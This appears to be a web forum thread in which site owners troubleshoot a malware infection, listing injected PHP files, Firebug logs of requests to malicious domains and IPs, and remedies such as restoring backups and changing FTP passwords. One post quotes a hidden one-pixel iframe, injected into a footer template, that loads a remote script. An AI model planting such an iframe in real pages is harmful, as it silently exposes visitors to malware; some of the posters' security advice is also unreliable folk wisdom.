I have some of the same extra files as you:
blog_search.php
commons.php
coms.php
jquery.php

But not the HTML files you have.

I'm still having trouble though. I followed the steps suggested:

1. Suspect File Versions. Done, found those extra PHP files above and renamed them.
2. Disabled all plugins (only VBseo)
3. Exported the database, searched the SQL for the offending domain names and IP addresses. None found.
4. Searched through my files for the domain names and IP addresses. None found. (Is it possible that it's encrypted in the files somehow so a search wouldn't find it?)
5. I don't have ads running, so that's not a problem.

Just wondering, do web servers cache files? So if I make a change and refresh (delete my own browser cache first), and I still get virus issues, is it possible the change DID work, except the server has it cached temporarily?

--------------- Added [DATE]1325542075[/DATE] at [TIME]1325542075[/TIME] ---------------

By the way, I found the offending domains/IPs by using Firefox/FireBug, in the "Net" tab it shows all the files requested, and there I saw some files being requested from other domains:

URL, Status, Domain, Size, Remote IP
GET http://44444vvvvv.mefound.com/dng311...cfc3b06a/0.php, 302 Found, 44444vvvvv.mefound.com, 20 B, 95.163.89.230:80
GET http://44444vvvvv.mefound.com/dng311...c3b06a/spl.php, 302 Found, 44444vvvvv.mefound.com, 20 B, 95.163.89.230:80
GET http://kokosina.in/t/go.php?sid=5, 302 Found, kokosina.in, 20 B, 46.37.184.227:80

These are the domains/IPs I searched for in the SQL and in the files. I also spotted those PHP files as weird because they had recent "modified" dates whereas the original files were untouched.

Sometimes the added code is encrypted, so you can search for base64 in the plugins.

</div><div style="display:none"><iframe src="http://www.cookaround.com/cook/robots.php" width="1" height="1"></iframe></div>

this iframe seems to be added check the footer template not sure if you want that there

--------------- Added [DATE]1325550426[/DATE] at [TIME]1325550426[/TIME] ---------------

http://www.malwaredomainlist.com/mdl...=78.111.51.119

--------------- Added [DATE]1325550515[/DATE] at [TIME]1325550515[/TIME] ---------------

http://support.clean-mx.de/clean-mx/...t=first%20desc

I ended up just replacing the files with a backed up version from before the hack. That was the quickest way, though I never found the hack.

Hello, I am also getting the attached virus pop up, did anyone figure out how to remove the virus yet?

95.163.89.230:80 <--- address blocked, but its not the address for my site, what add on or plugin is causing this?

I disabled all the add on's and I still have the virus, I found all the suspect files the common.php, coms.php, jquery.php ect and deleted them already but I still have this virus issue, It sure would be nice to find the source of this and prevent it from happening in the future.

myke

I've been having a lot of issues with the same stuff. After several attempts to find the bugs, it was determined the server was compromised. I just switched servers with a trusted forum member here and the site was back up in two minutes and runs like a charm.

Just because someone offers hosting doesn't make them a good host...especially if they have clients with a grudge for ripping them off.

...I'm just saying pick your host carefully.

I heard that these malware scripts are getting in to your webserver by hacking your ftp password. What you have to do is find that malware files or code and delete. Submit your website to re-evaluation through google webmaster tools.
Hackers might get your saved password in ftp. So delete history and change the password immediately.
Recent times I am not using ftp. I am uploading zipped files directly through cpanel to prevent from hackers.
We should not blame your host regarding this issue. Hackers getting in to web server through your PC. So clean your PC with any good antivirus.